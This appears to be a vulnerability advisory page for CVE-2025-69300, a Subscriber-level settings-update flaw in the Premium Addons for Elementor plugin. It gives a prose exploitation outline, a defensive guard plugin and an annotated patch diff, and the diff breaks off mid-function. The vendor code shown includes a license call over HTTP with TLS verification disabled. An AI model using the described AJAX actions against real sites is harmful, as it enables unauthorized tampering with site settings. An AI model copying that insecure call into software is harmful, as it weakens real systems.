Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-69300: Premium Addons for Elementor <= 4.11.63 – Missing Authorization to Authenticated (Subscriber+) Settings Update (premium-addons-for-elementor)

Severity: Medium (CVSS 4.3)
CWE: 862
Vulnerable Version: 4.11.63
Patched Version: 4.11.64
Disclosed: January 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-69300:
This vulnerability is a missing authorization flaw in the Premium Addons for Elementor WordPress plugin. The vulnerability allows authenticated attackers with Subscriber-level permissions to modify plugin settings, which should be restricted to administrators. The CVSS score of 4.3 indicates medium severity with low attack complexity.

Root Cause:
The vulnerability exists in the admin-helper.php file, where multiple AJAX handler functions lack proper capability checks. Specifically, the functions `save_integration_settings`, `save_google_sheets_settings`, `save_global_css_js_settings`, and `disable_elementor_mini_cart_template` in the Admin_Helper class do not verify that the current user has the `manage_options` capability before processing settings updates. The vulnerable code at lines 933, 1002, 1035, and 1506 in the patched version shows where these checks were missing. Each function processes POST data containing plugin configuration changes without authorization validation.

Exploitation:
An attacker with Subscriber-level access can send POST requests to the WordPress admin-ajax.php endpoint with the action parameter set to `pa_save_integration`, `pa_save_google_sheets`, `pa_save_global_css_js`, or `pa_disable_mini_cart_template`. The requests must include the `security` parameter with a valid nonce (which Subscribers can obtain) and the `fields` parameter containing the settings to modify. The attacker can manipulate various plugin configurations including integration settings, Google Sheets connections, global CSS/JS, and Elementor template settings.

Patch Analysis:
The patch adds capability checks using the `self::check_user_can( 'manage_options' )` method before processing settings in all vulnerable functions. In the patched version at lines 933, 1002, 1035, and 1506, the code now returns a JSON error response if the user lacks administrator privileges. The patch also standardizes authorization checks by replacing direct `current_user_can()` calls with the centralized `self::check_user_can()` method in other functions at lines 461, 486, 517, 1445, and 1543, ensuring consistent permission validation across the codebase.
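
A site that cannot move to 4.11.64 immediately can enforce the same check from outside the plugin. The must-use plugin below is an added example, not code from the plugin or its patch: it guards the four action names listed under Exploitation, calls `current_user_can()` directly because the body of `check_user_can()` is not shown on this page, and its file name, constant name, function name and log prefix are hypothetical.

```php
<?php
/**
 * Plugin Name: PA settings AJAX guard (added example)
 * Description: Requires manage_options on the four AJAX actions named in the analysis.
 *
 * Hypothetical file: wp-content/mu-plugins/pa-ajax-guard.php
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

// Action names as listed in the analysis; each maps to a wp_ajax_{action} hook.
const PA_GUARD_ACTIONS = array(
	'pa_save_integration',
	'pa_save_google_sheets',
	'pa_save_global_css_js',
	'pa_disable_mini_cart_template',
);

/**
 * Stop the request unless the caller is allowed to manage options.
 * (Function name is hypothetical.)
 */
function pa_guard_require_manage_options() {
	if ( current_user_can( 'manage_options' ) ) {
		return; // Authorized: fall through to the plugin's own handler.
	}

	// Record who tried which action so the attempt shows up in the PHP error log.
	error_log(
		sprintf(
			'pa-ajax-guard: denied %s for user ID %d',
			current_action(),
			get_current_user_id()
		)
	);

	// Sends the JSON error with HTTP 403 and ends the request.
	wp_send_json_error( 'User is not authorized!', 403 );
}

foreach ( PA_GUARD_ACTIONS as $pa_guard_action ) {
	// PHP_INT_MIN makes the guard the first callback on the hook.
	add_action( 'wp_ajax_' . $pa_guard_action, 'pa_guard_require_manage_options', PHP_INT_MIN );
}
```

Remove the file once the site runs the patched version.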

Impact:
Successful exploitation allows attackers with minimal privileges to modify plugin settings, potentially disrupting website functionality, enabling unauthorized integrations, injecting malicious CSS/JavaScript, or disabling critical features. While this does not directly lead to remote code execution, it can facilitate other attacks by modifying configuration that controls content display, external service connections, or security settings. The vulnerability could be chained with other weaknesses to escalate privileges or compromise site integrity.

Differential between vulnerable and patched code

Code Diff
--- a/premium-addons-for-elementor/addons/display-conditions.php
+++ b/premium-addons-for-elementor/addons/display-conditions.php
@@ -44,7 +44,6 @@

 	/**
 	 * Constructor
-	 *
 	 */
 	public function __construct() {

@@ -113,7 +112,7 @@
 				'acf_choice'  => __( 'Choice', 'premium-addons-for-elementor' ),
 				'acf_text'    => __( 'Text', 'premium-addons-for-elementor' ),
 				'acf_boolean' => __( 'True/False', 'premium-addons-for-elementor' ),
-			)
+			),
 		);

 		$options['woocommerce'] = array(
@@ -129,7 +128,7 @@
 				'woo_total_price'       => __( 'Amount In Cart', 'premium-addons-for-elementor' ),
 				'woo_cart_products'     => __( 'Products In Cart', 'premium-addons-for-elementor' ),
 				'woo_purchase_products' => __( 'Purchased Products', 'premium-addons-for-elementor' ),
-			)
+			),
 		);

 		$options = apply_filters( 'pa_display_conditions', $options );
@@ -263,23 +262,6 @@
 				),
 			)
 		);
-
-		$repeater->add_control(
-			'pa_condition_loc_method',
-			array(
-				'label'       => __( 'Location Detect Method', 'premium-addons-for-elementor' ),
-				'type'        => Controls_Manager::SELECT,
-				'default'     => 'old',
-				'label_block' => true,
-				'options'     => array(
-					'old' => __( 'Old', 'premium-addons-for-elementor' ),
-					'new' => __( 'New', 'premium-addons-for-elementor' ),
-				),
-				'condition'   => array(
-					'pa_condition_key' => 'ip_location',
-				),
-			)
-		);

 		$values = $repeater->get_controls();

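Review bot: Removing the pa_condition_loc_method control is unrelated to the authorization fix and should ship as its own change, with a changelog entry. Nothing in this hunk shows what happens to display conditions already saved with the value 'new' for that key; either show the code that stops reading it or keep a fallback for stored values.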
--- a/premium-addons-for-elementor/admin/includes/admin-bar.php
+++ b/premium-addons-for-elementor/admin/includes/admin-bar.php
@@ -1,170 +1,169 @@
-<?php
-/**
- * PA Admin Bar
- */
-
-namespace PremiumAddonsAdminIncludes;
-
-use PremiumAddonsIncludesHelper_Functions;
-use PremiumAddonsAdminIncludesAdmin_Helper;
-
-if ( ! defined( 'ABSPATH' ) ) {
-	exit;
-}
-
-/**
- * Class Admin_Bar
- */
-class Admin_Bar {
-
-	/**
-	 * Class instance
-	 *
-	 * @var instance
-	 */
-	private static $instance = null;
-
-	/**
-	 * Constructor for the class
-	 */
-	public function __construct() {
-
-		add_action( 'admin_bar_menu', array( $this, 'add_toolbar_items' ), 500 );
-
-		add_action( 'wp_enqueue_scripts', array( $this, 'enqueue_frontend_assets' ) );
-
-	}
-
-	public function enqueue_frontend_assets() {
-
-		if ( ! Admin_Helper::check_user_can( 'manage_options' ) ) {
-			return;
-		}
-
-		wp_enqueue_style(
-			'pa-admin-bar',
-			PREMIUM_ADDONS_URL . 'admin/assets/css/admin-bar.css',
-			array(),
-			PREMIUM_ADDONS_VERSION,
-			'all'
-		);
-
-		wp_enqueue_script(
-			'pa-admin-bar',
-			PREMIUM_ADDONS_URL . 'admin/assets/js/admin-bar.js',
-			array( 'jquery' ),
-			PREMIUM_ADDONS_VERSION,
-			true
-		);
-
-		wp_localize_script(
-			'pa-admin-bar',
-			'PaDynamicAssets',
-			array(
-				'nonce'   => wp_create_nonce( 'pa-generate-nonce' ),
-				'post_id' => get_queried_object_id(),
-				'ajaxurl' => admin_url( 'admin-ajax.php' ),
-			)
-		);
-	}
-
-	public function add_toolbar_items( WP_Admin_Bar $admin_bar ) {
-
-		if ( ! Admin_Helper::check_user_can( 'manage_options' ) ) {
-			return;
-		}
-
-		$icon = '<i class="dashicons dashicons-update-alt"></i> ';
-
-		$admin_bar->add_menu(
-			array(
-				'id'    => 'premium-addons',
-				'title' => $icon . __( ' Clear PA Assets', 'premium-addons-for-elementor' ),
-				'href'  => $this->get_dashboard_widgets_link(),
-				'meta'  => array(
-					'title' => __( 'Premium Addons', 'premium-addons-for-elementor' ),
-				),
-			)
-		);
-
-		if ( is_singular() ) {
-			$admin_bar->add_menu(
-				array(
-					'id'     => 'pa-clear-page-cache',
-					'parent' => 'premium-addons',
-					'title'  => $icon . __( 'Clear Page Generated Assets', 'premium-addons-for-elementor' ),
-					'href'   => '#',
-					'meta'   => array(
-						'class' => 'pa-clear-cache pa-clear-page-cache',
-					),
-				)
-			);
-		}
-
-		$admin_bar->add_menu(
-			array(
-				'id'     => 'pa-clear-all-cache',
-				'parent' => 'premium-addons',
-				'title'  => $icon . __( 'Clear All Generated Assets', 'premium-addons-for-elementor' ),
-				'href'   => '#',
-				'meta'   => array(
-					'class' => 'pa-clear-cache pa-clear-all-cache',
-				),
-			)
-		);
-
-		$doc_icon = '<i class="dashicons dashicons-editor-help"></i> ';
-
-		$admin_bar->add_menu(
-			array(
-				'id'     => 'pa-feature-doc',
-				'parent' => 'premium-addons',
-				'title'  => $doc_icon . __( 'Learn More', 'premium-addons-for-elementor' ),
-				'href'   => 'https://premiumaddons.com/docs/elementor-dynamic-assets-generate-loading/',
-				'meta'   => array(
-					'target' => '_blank',
-				),
-			)
-		);
-	}
-
-	/**
-	 * Get Dashboard Widgets Link
-	 *
-	 * Returns links for Widgets & Addons dashboard tab.
-	 *
-	 * @since 4.9.4
-	 * @access private
-	 *
-	 * @return string tab link.
-	 */
-	private function get_dashboard_widgets_link() {
-
-		return add_query_arg(
-			array(
-				'page' => 'premium-addons',
-				'#tab' => 'elements',
-			),
-			esc_url( admin_url( 'admin.php' ) )
-		);
-	}
-
-	/**
-	 * Creates and returns an instance of the class
-	 *
-	 * @since 3.20.9
-	 * @access public
-	 *
-	 * @return object
-	 */
-	public static function get_instance() {
-
-		if ( ! isset( self::$instance ) ) {
-
-			self::$instance = new self();
-
-		}
-
-		return self::$instance;
-	}
-}
+<?php
+/**
+ * PA Admin Bar
+ */
+
+namespace PremiumAddonsAdminIncludes;
+
+use PremiumAddonsIncludesHelper_Functions;
+use PremiumAddonsAdminIncludesAdmin_Helper;
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
+/**
+ * Class Admin_Bar
+ */
+class Admin_Bar {
+
+	/**
+	 * Class instance
+	 *
+	 * @var instance
+	 */
+	private static $instance = null;
+
+	/**
+	 * Constructor for the class
+	 */
+	public function __construct() {
+
+		add_action( 'admin_bar_menu', array( $this, 'add_toolbar_items' ), 500 );
+
+		add_action( 'wp_enqueue_scripts', array( $this, 'enqueue_frontend_assets' ) );
+	}
+
+	public function enqueue_frontend_assets() {
+
+		if ( ! Admin_Helper::check_user_can( 'manage_options' ) ) {
+			return;
+		}
+
+		wp_enqueue_style(
+			'pa-admin-bar',
+			PREMIUM_ADDONS_URL . 'admin/assets/css/admin-bar.css',
+			array(),
+			PREMIUM_ADDONS_VERSION,
+			'all'
+		);
+
+		wp_enqueue_script(
+			'pa-admin-bar',
+			PREMIUM_ADDONS_URL . 'admin/assets/js/admin-bar.js',
+			array( 'jquery' ),
+			PREMIUM_ADDONS_VERSION,
+			true
+		);
+
+		wp_localize_script(
+			'pa-admin-bar',
+			'PaDynamicAssets',
+			array(
+				'nonce'   => wp_create_nonce( 'pa-generate-nonce' ),
+				'post_id' => get_queried_object_id(),
+				'ajaxurl' => admin_url( 'admin-ajax.php' ),
+			)
+		);
+	}
+
+	public function add_toolbar_items( WP_Admin_Bar $admin_bar ) {
+
+		if ( ! Admin_Helper::check_user_can( 'manage_options' ) ) {
+			return;
+		}
+
+		$icon = '<i class="dashicons dashicons-update-alt"></i> ';
+
+		$admin_bar->add_menu(
+			array(
+				'id'    => 'premium-addons',
+				'title' => $icon . __( ' Clear PA Assets', 'premium-addons-for-elementor' ),
+				'href'  => $this->get_dashboard_widgets_link(),
+				'meta'  => array(
+					'title' => __( 'Premium Addons', 'premium-addons-for-elementor' ),
+				),
+			)
+		);
+
+		if ( is_singular() ) {
+			$admin_bar->add_menu(
+				array(
+					'id'     => 'pa-clear-page-cache',
+					'parent' => 'premium-addons',
+					'title'  => $icon . __( 'Clear Page Generated Assets', 'premium-addons-for-elementor' ),
+					'href'   => '#',
+					'meta'   => array(
+						'class' => 'pa-clear-cache pa-clear-page-cache',
+					),
+				)
+			);
+		}
+
+		$admin_bar->add_menu(
+			array(
+				'id'     => 'pa-clear-all-cache',
+				'parent' => 'premium-addons',
+				'title'  => $icon . __( 'Clear All Generated Assets', 'premium-addons-for-elementor' ),
+				'href'   => '#',
+				'meta'   => array(
+					'class' => 'pa-clear-cache pa-clear-all-cache',
+				),
+			)
+		);
+
+		$doc_icon = '<i class="dashicons dashicons-editor-help"></i> ';
+
+		$admin_bar->add_menu(
+			array(
+				'id'     => 'pa-feature-doc',
+				'parent' => 'premium-addons',
+				'title'  => $doc_icon . __( 'Learn More', 'premium-addons-for-elementor' ),
+				'href'   => 'https://premiumaddons.com/docs/elementor-dynamic-assets-generate-loading/',
+				'meta'   => array(
+					'target' => '_blank',
+				),
+			)
+		);
+	}
+
+	/**
+	 * Get Dashboard Widgets Link
+	 *
+	 * Returns links for Widgets & Addons dashboard tab.
+	 *
+	 * @since 4.9.4
+	 * @access private
+	 *
+	 * @return string tab link.
+	 */
+	private function get_dashboard_widgets_link() {
+
+		return add_query_arg(
+			array(
+				'page' => 'premium-addons',
+				'#tab' => 'elements',
+			),
+			esc_url( admin_url( 'admin.php' ) )
+		);
+	}
+
+	/**
+	 * Creates and returns an instance of the class
+	 *
+	 * @since 3.20.9
+	 * @access public
+	 *
+	 * @return object
+	 */
+	public static function get_instance() {
+
+		if ( ! isset( self::$instance ) ) {
+
+			self::$instance = new self();
+
+		}
+
+		return self::$instance;
+	}
+}
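Review bot: The real change to admin-bar.php is hard to audit because the whole file is replaced. Comparing the two sides, the only visible difference is the blank line dropped before the closing brace of __construct() (170 lines become 169), so the rest looks like line-ending or whitespace normalization. Please commit that normalization separately so that a reviewer of the security fix does not have to re-read the capability checks and the pa-generate-nonce localization to confirm nothing moved.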
--- a/premium-addons-for-elementor/admin/includes/admin-helper.php
+++ b/premium-addons-for-elementor/admin/includes/admin-helper.php
@@ -461,7 +461,7 @@

 		check_ajax_referer( 'pa-menu-nonce', 'security' );

-		if ( ! current_user_can( 'manage_options' ) ) {
+		if ( ! self::check_user_can( 'manage_options' ) ) {
 			wp_send_json_error( 'User is not authorized!' );
 		}

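Review bot: The body of self::check_user_can() is not part of this diff, so it cannot be confirmed from here that the wrapper is at least as strict as the current_user_can( 'manage_options' ) call it replaces. Please include or link the helper's definition; the same swap in the hunks at 486, 517, 1433 and 1527 depends on it too.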
@@ -486,7 +486,7 @@

 		check_ajax_referer( 'pa-menu-nonce', 'security' );

-		if ( ! current_user_can( 'manage_options' ) ) {
+		if ( ! self::check_user_can( 'manage_options' ) ) {
 			wp_send_json_error( 'User is not authorized!' );
 		}

@@ -517,7 +517,7 @@

 		check_ajax_referer( 'pa-live-editor', 'security' );

-		if ( ! current_user_can( 'edit_theme_options' ) ) {
+		if ( ! self::check_user_can( 'edit_theme_options' ) ) {
 			wp_send_json_error( 'Insufficient user permission' );
 		}

@@ -933,6 +933,10 @@

 		check_ajax_referer( 'pa-settings-tab', 'security' );

+		if ( ! self::check_user_can( 'manage_options' ) ) {
+			wp_send_json_error( __( 'You are not allowed to do this action', 'premium-addons-for-elementor' ) );
+		}
+
 		if ( ! isset( $_POST['fields'] ) ) {
 			return;
 		}
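Review bot: The new rejection at the top of this handler calls wp_send_json_error() without a status code, so an unauthorized request is still answered with HTTP 200 and is indistinguishable from a normal admin-ajax.php call in access logs. Pass a status as the second argument, for example wp_send_json_error( __( 'You are not allowed to do this action', 'premium-addons-for-elementor' ), 403 ), so denied attempts can be counted and alerted on.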
@@ -1002,6 +1006,10 @@

 		check_ajax_referer( 'pa-settings-tab', 'security' );

+		if ( ! self::check_user_can( 'manage_options' ) ) {
+			wp_send_json_error( __( 'You are not allowed to do this action', 'premium-addons-for-elementor' ) );
+		}
+
 		if ( ! isset( $_POST['fields'] ) ) {
 			return;
 		}
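Review bot: The capability check added here duplicates the block in the hunk at 933 and is pasted again at 1035 and 1506; a copy-pasted guard is easy to leave out of the next handler. Consider one private helper that performs both check_ajax_referer( 'pa-settings-tab', 'security' ) and the manage_options check, and call it as the first line of every pa-settings-tab handler.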
@@ -1035,6 +1043,10 @@

 		check_ajax_referer( 'pa-settings-tab', 'security' );

+		if ( ! self::check_user_can( 'manage_options' ) ) {
+			wp_send_json_error( __( 'You are not allowed to do this action', 'premium-addons-for-elementor' ) );
+		}
+
 		if ( ! isset( $_POST['isGlobalOn'] ) ) {
 			wp_send_json_error();
 		}
@@ -1433,7 +1445,7 @@

 		check_ajax_referer( 'pa-disable-unused', 'security' );

-		if ( ! current_user_can( 'install_plugins' ) ) {
+		if ( ! self::check_user_can( 'install_plugins' ) ) {
 			wp_send_json_error();
 		}

@@ -1506,6 +1518,10 @@

 		check_ajax_referer( 'pa-settings-tab', 'security' );

+		if ( ! self::check_user_can( 'manage_options' ) ) {
+			wp_send_json_error( __( 'You are not allowed to do this action', 'premium-addons-for-elementor' ) );
+		}
+
 		update_option( 'elementor_use_mini_cart_template', 'no' );

 		wp_send_json_success( 'Elementor Mini Cart Template Disabled.' );
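Review bot: No test is visible in this part of the diff for the new check, which here guards a write to the site-wide option elementor_use_mini_cart_template. Add a regression test that calls each of the four pa-settings-tab handlers as a Subscriber with a valid nonce and asserts an error response and an unchanged option, so the guard cannot be dropped silently in a later refactor.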
@@ -1527,7 +1543,7 @@

 		check_ajax_referer( 'pa-site-cursor-nonce', 'security' );

-		if ( ! current_user_can( 'manage_options' ) ) {
+		if ( ! self::check_user_can( 'manage_options' ) ) {
 			wp_send_json_error( __( 'You are not allowed to do this action', 'premium-addons-for-elementor' ) );
 		}

--- a/premium-addons-for-elementor/admin/includes/admin-notices.php
+++ b/premium-addons-for-elementor/admin/includes/admin-notices.php
@@ -1,736 +1,734 @@
-<?php
-/**
- * PA Admin Notices.
- */
-
-namespace PremiumAddonsAdminIncludes;
-
-use PremiumAddonsIncludesHelper_Functions;
-
-if ( ! defined( 'ABSPATH' ) ) {
-	exit();
-}
-
-/**
- * Class Admin_Notices
- */
-class Admin_Notices {
-
-	/**
-	 * Premium Addons Stories
-	 *
-	 * @var stories
-	 */
-	private $stories = array();
-
-	/**
-	 * Class object
-	 *
-	 * @var instance
-	 */
-	private static $instance = null;
-
-	/**
-	 * Elementor slug
-	 *
-	 * @var elementor
-	 */
-	private static $elementor = 'elementor';
-
-	/**
-	 * PAPRO Slug
-	 *
-	 * @var papro
-	 */
-	private static $papro = 'premium-addons-pro';
-
-	/**
-	 * Notices Keys
-	 *
-	 * @var notices
-	 */
-	private static $notices = null;
-
-	/**
-	 * Constructor for the class
-	 */
-	public function __construct() {
-
-		add_action( 'admin_init', array( $this, 'init' ) );
-
-		add_action( 'admin_notices', array( $this, 'admin_notices' ) );
-
-		add_action( 'admin_enqueue_scripts', array( $this, 'admin_enqueue_scripts' ) );
-
-		add_action( 'wp_ajax_pa_reset_admin_notice', array( $this, 'reset_admin_notice' ) );
-
-		add_action( 'wp_ajax_pa_dismiss_admin_notice', array( $this, 'dismiss_admin_notice' ) );
-
-		self::$notices = array(
-			'pa-review',
-			'bf25-last-not'
-		);
-
-		if ( Helper_Functions::check_hide_notifications() ) {
-			return;
-		}
-
-		add_action( 'wp_dashboard_setup', array( $this, 'show_story_widget' ), 111 );
-	}
-
-	/**
-	 * Init
-	 *
-	 * Init required functions
-	 *
-	 * The redirection happens on the first admin page after activation ( the plugins page ).
-	 *
-	 * @since 1.0.0
-	 * @access public
-	 */
-	public function init() {
-
-		$this->handle_review_notice();
-
-		if ( Helper_Functions::check_elementor_version() && get_transient( 'pa_activation_redirect' ) ) {
-
-			delete_transient( 'pa_activation_redirect' );
-
-			$redirect = add_query_arg(
-				array(
-					'page' => 'pa-setup-wizard', // this mean it should've been added first.
-				),
-				admin_url( 'admin.php' )
-			);
-
-			wp_safe_redirect( $redirect );
-
-			exit;
-		}
-	}
-
-	/**
-	 * Init notices check functions.
-	 */
-	public function admin_notices() {
-
-		// Skip rendering notices during AJAX requests.
-		if ( wp_doing_ajax() ) {
-			return;
-		}
-
-		$this->required_plugins_check();
-
-		// Make sure "Already did" was not clicked before.
-		$show_review = get_option( 'pa_review_notice' );
-		if ( '1' !== $show_review ) {
-
-			$cache_key = 'pa_review_notice';
-
-			$response = get_transient( $cache_key );
-
-			if ( false == $response ) {
-				$this->show_review_notice();
-			}
-		}
-
-		if ( Helper_Functions::check_hide_notifications() ) {
-			return;
-		}
-
-		// $this->get_black_friday_notice();
-
-	}
-
-	/**
-	 * Handle Review Notice
-	 *
-	 * Checks if review message is dismissed.
-	 *
-	 * @access public
-	 * @return void
-	 */
-	public function handle_review_notice() {
-
-		if ( ! isset( $_GET['pa_review'] ) ) {
-			return;
-		}
-
-		if ( 'opt_out' === $_GET['pa_review'] ) {
-			check_admin_referer( 'opt_out' );
-
-			update_option( 'pa_review_notice', '1' );
-		}
-
-		wp_safe_redirect( remove_query_arg( 'pa_review' ) );
-
-		exit;
-	}
-
-	/**
-	 * Required plugin check
-	 *
-	 * Shows an admin notice when Elementor is missing.
-	 *
-	 * @since 1.0.0
-	 * @access public
-	 */
-	public function required_plugins_check() {
-
-		// Early return if Elementor is already active.
-		if ( Helper_Functions::check_elementor_version() ) {
-			return;
-		}
-
-		$elementor_path = sprintf( '%1$s/%1$s.php', self::$elementor );
-
-		$message = '';
-
-		if ( ! Helper_Functions::is_plugin_installed( $elementor_path ) ) {
-
-			if ( ! Admin_Helper::check_user_can( 'install_plugins' ) ) {
-				return;
-			}
-
-			$install_url = wp_nonce_url( self_admin_url( sprintf( 'update.php?action=install-plugin&plugin=%s', self::$elementor ) ), 'install-plugin_elementor' );
-
-			$message = sprintf( '<p>%s</p>', __( 'Premium Addons for Elementor is not working because you need to Install Elementor plugin.', 'premium-addons-for-elementor' ) );
-
-			$message .= sprintf( '<p><a href="%s" class="button-primary">%s</a></p>', $install_url, __( 'Install Now', 'premium-addons-for-elementor' ) );
-
-		} elseif ( Admin_Helper::check_user_can( 'activate_plugins' ) ) {
-
-			$activation_url = wp_nonce_url( 'plugins.php?action=activate&plugin=' . $elementor_path . '&plugin_status=all&paged=1&s', 'activate-plugin_' . $elementor_path );
-
-			$message = '<p>' . __( 'Premium Addons for Elementor is not working because you need to activate Elementor plugin.', 'premium-addons-for-elementor' ) . '</p>';
-
-			$message .= '<p>' . sprintf( '<a href="%s" class="button-primary">%s</a>', $activation_url, __( 'Activate Now', 'premium-addons-for-elementor' ) ) . '</p>';
-		} else {
-			return;
-		}
-
-		if ( ! empty( $message ) ) {
-			$this->render_admin_notices( $message );
-		}
-	}
-
-	/**
-	 * Get Review Text
-	 *
-	 * Gets admin review notice HTML.
-	 *
-	 * @since 2.8.4
-	 * @access public
-	 *
-	 * @param string $review_url plugin page.
-	 * @param string $optout_url redirect url.
-	 */
-	public function get_review_text( $review_url, $optout_url ) {
-
-		$notice = sprintf(
-			'<p>' . __( 'Could we take just 2 minutes of your time? We'd be incredibly grateful if you could give ', 'premium-addons-for-elementor' ) .
-			'<b>' . __( 'Premium Addons for Elementor', 'premium-addons-for-elementor' ) . '</b> a 5 Stars Rating on WordPress.org. Your support helps us continue creating even more amazing free features in the future!</p>
-            <div>
-                <a class="button pa-review-btn button-primary" href="%s" target="_blank"><span>' . __( 'Sure, leave a Review', 'premium-addons-for-elementor' ) . '</span></a>
-                <a class="button" href="%2$s"><span>' . __( 'I Already Did', 'premium-addons-for-elementor' ) . '</span></a>
-                <a class="button button-secondary pa-notice-reset"><span>' . __( 'Maybe Later', 'premium-addons-for-elementor' ) . '</span></a>
-            </div>',
-			$review_url,
-			$optout_url
-		);
-
-		return $notice;
-	}
-
-	/**
-	 * Checks if review admin notice is dismissed
-	 *
-	 * @since 2.6.8
-	 * @return void
-	 */
-	public function show_review_notice() {
-
-		$review_url = 'https://wordpress.org/support/plugin/premium-addons-for-elementor/reviews/#new-post';
-
-		$optout_url = wp_nonce_url( add_query_arg( 'pa_review', 'opt_out' ), 'opt_out' );
-		?>
-
-		<div class="error pa-notice-wrap pa-review-notice" data-notice="pa-review">
-			<div class="pa-img-wrap">
-				<img src="<?php echo esc_url( PREMIUM_ADDONS_URL . 'admin/images/pa-logo-symbol.png' ); ?>">
-			</div>
-			<div class="pa-text-wrap">
-				<?php echo wp_kses_post( $this->get_review_text( $review_url, $optout_url ) ); ?>
-			</div>
-			<div class="pa-notice-close">
-				<a href="<?php echo esc_url( $optout_url ); ?>"><span class="dashicons dashicons-dismiss"></span></a>
-			</div>
-		</div>
-
-		<?php
-	}
-
-	public function get_black_friday_notice() {
-
-        $time     = time();
-
-        if ( $time > 1765497600 || '1' === get_option( 'bf25-last-not' ) ) {
-			return;
-		}
-
-		$is_papro_active = Helper_Functions::check_papro_version();
-
-		$license_key = get_option( 'papro_license_key' );
-
-		$link = Helper_Functions::get_campaign_link( 'https://premiumaddons.com/black-friday/#bfdeals', 'wp-dash', 'bf25-notification', 'cm25' );
-
-		$promotion_type = 'new';
-
-        if ( $is_papro_active ) {
-
-			$license_data = get_transient( 'pa_license_info' );
-
-            if( isset( $license_data['status'] ) && 'valid' === $license_data['status'] ) {
-
-				if( isset( $license_data['id'] ) && '4' === $license_data['id'] ) {
-					return;
-				} else {
-
-					$promotion_type = 'upgrade';
-
-					$link = Helper_Functions::get_campaign_link( 'https://premiumaddons.com/docs/upgrade-premium-addons-license/', 'wp-dash', 'bf25-notification', 'cm25' );
-				}
-
-            }
-
-		}
-
-		$message = $this->get_promotion_message( $promotion_type );
-
-		?>
-
-		<div class="error pa-notice-wrap pa-new-feature-notice pa-review-notice">
-			<div class="pa-img-wrap">
-				<img src="<?php echo PREMIUM_ADDONS_URL . 'admin/images/pa-logo-symbol.png'; ?>">
-			</div>
-			<div class="pa-text-wrap">
-				<p>
-					<?php echo wp_kses_post( $message['message'] ); ?>
-					<a class="button pa-cta-btn button-primary" href="<?php echo esc_url( $link ); ?>" target="_blank">
-						<span><?php echo wp_kses_post( $message['cta'] ); ?></span>
-					</a>
-				</p>
-			</div>
-			<div class="pa-notice-close" data-notice="bf25-last-not">
-				<span class="dashicons dashicons-dismiss"></span>
-			</div>
-		</div>
-
-		<?php
-	}
-
-	/**
-	 * Get Promotion Message
-	 *
-	 * @since 4.11.43
-	 * @access private
-	 *
-	 * @param string $type promotion type.
-	 * @return array
-	 */
-	private function get_promotion_message( $type = 'new' ) {
-
-		if ( 'upgrade' === $type ) {
-			return array(
-				'message' => __( 'Get a <b>FLAT 35% OFF</b> when you upgrade to <b>Premium Addons Pro Lifetime</b>. Use code <b>BFUL2025</b> at checkout – <b>expires soon!</b>', 'premium-addons-for-elementor' ),
-				'cta'    => __( 'Upgrade Now', 'premium-addons-for-elementor' ),
-			);
-
-		}
-
-		return array(
-			'message' => __( '<b>Cyber Monday – Save Up To $105 on Premium Addons Pro</b>.', 'premium-addons-for-elementor' ),
-			'cta'    => __( 'Catch The Deal', 'premium-addons-for-elementor' ),
-		);
-	}
-
-	/**
-	 * Renders an admin notice error message
-	 *
-	 * @since 1.0.0
-	 * @access private
-	 *
-	 * @param string $message notice text.
-	 * @param string $class notice class.
-	 * @param string $handle notice handle.
-	 *
-	 * @return void
-	 */
-	private function render_admin_notices( $message, $class = '', $handle = '' ) {
-		?>
-			<div class="error pa-new-feature-notice <?php echo esc_attr( $class ); ?>" data-notice="<?php echo esc_attr( $handle ); ?>">
-				<?php echo wp_kses_post( $message ); ?>
-			</div>
-		<?php
-	}
-
-
-
-	/**
-	 * Register admin scripts
-	 *
-	 * @since 3.2.8
-	 * @access public
-	 */
-	public function admin_enqueue_scripts() {
-
-		// Skip loading scripts during AJAX or REST requests.
-		if ( wp_doing_ajax() || ( defined( 'REST_REQUEST' ) && REST_REQUEST ) ) {
-			return;
-		}
-
-		wp_enqueue_script(
-			'pa-dashboard',
-			PREMIUM_ADDONS_URL . 'admin/assets/js/pa-dashboard.js',
-			array( 'jquery' ),
-			PREMIUM_ADDONS_VERSION,
-			true
-		);
-
-		wp_localize_script(
-			'pa-dashboard',
-			'PaNoticeSettings',
-			array(
-				'ajaxurl' => esc_url( admin_url( 'admin-ajax.php' ) ),
-				'nonce'   => wp_create_nonce( 'pa-notice-nonce' ),
-			)
-		);
-	}
-
-	/**
-	 * Set transient for admin notice
-	 *
-	 * @since 3.2.8
-	 * @access public
-	 *
-	 * @return void
-	 */
-	public function reset_admin_notice() {
-
-		check_ajax_referer( 'pa-notice-nonce', 'nonce' );
-
-		if ( ! Admin_Helper::check_user_can( 'manage_options' ) ) {
-			wp_send_json_error();
-		}
-
-		$key = isset( $_POST['notice'] ) ? sanitize_text_field( wp_unslash( $_POST['notice'] ) ) : '';
-
-		if ( ! empty( $key ) && in_array( $key, self::$notices, true ) ) {
-
-			$cache_key = 'pa_review_notice';
-
-			set_transient( $cache_key, true, WEEK_IN_SECONDS );
-
-			wp_send_json_success();
-
-		} else {
-
-			wp_send_json_error();
-
-		}
-	}
-
-	/**
-	 * Dismiss admin notice
-	 *
-	 * @since 3.11.7
-	 * @access public
-	 *
-	 * @return void
-	 */
-	public function dismiss_admin_notice() {
-
-		check_ajax_referer( 'pa-notice-nonce', 'nonce' );
-
-		if ( ! current_user_can( 'manage_options' ) ) {
-			wp_send_json_error();
-		}
-
-		$key = isset( $_POST['notice'] ) ? sanitize_text_field( wp_unslash( $_POST['notice'] ) ) : '';
-
-		if ( ! empty( $key ) && in_array( $key, self::$notices, true ) ) {
-
-			// Make sure new features notices will not appear again.
-			if ( false != strpos( $key, 'not' ) ) {
-				update_option( $key, '1' );
-			} else {
-				set_transient( $key, true, 20 * DAY_IN_SECONDS );
-
-			}
-
-			wp_send_json_success();
-
-		} else {
-
-			wp_send_json_error();
-
-		}
-	}
-
-	/**
-	 * Check Status
-	 *
-	 * @since 4.10.15
-	 * @access public
-	 */
-	public function check_status( $key ) {
-
-		$status = false;
-
-		$api_params = array(
-			'edd_action' => 'check_license',
-			'license'    => $key,
-			'item_id'    => 361,
-		);
-
-		$response = wp_remote_get(
-			'http://my.leap13.com',
-			array(
-				'timeout'   => 15,
-				'sslverify' => false,
-				'body'      => $api_params,
-			)
-		);
-
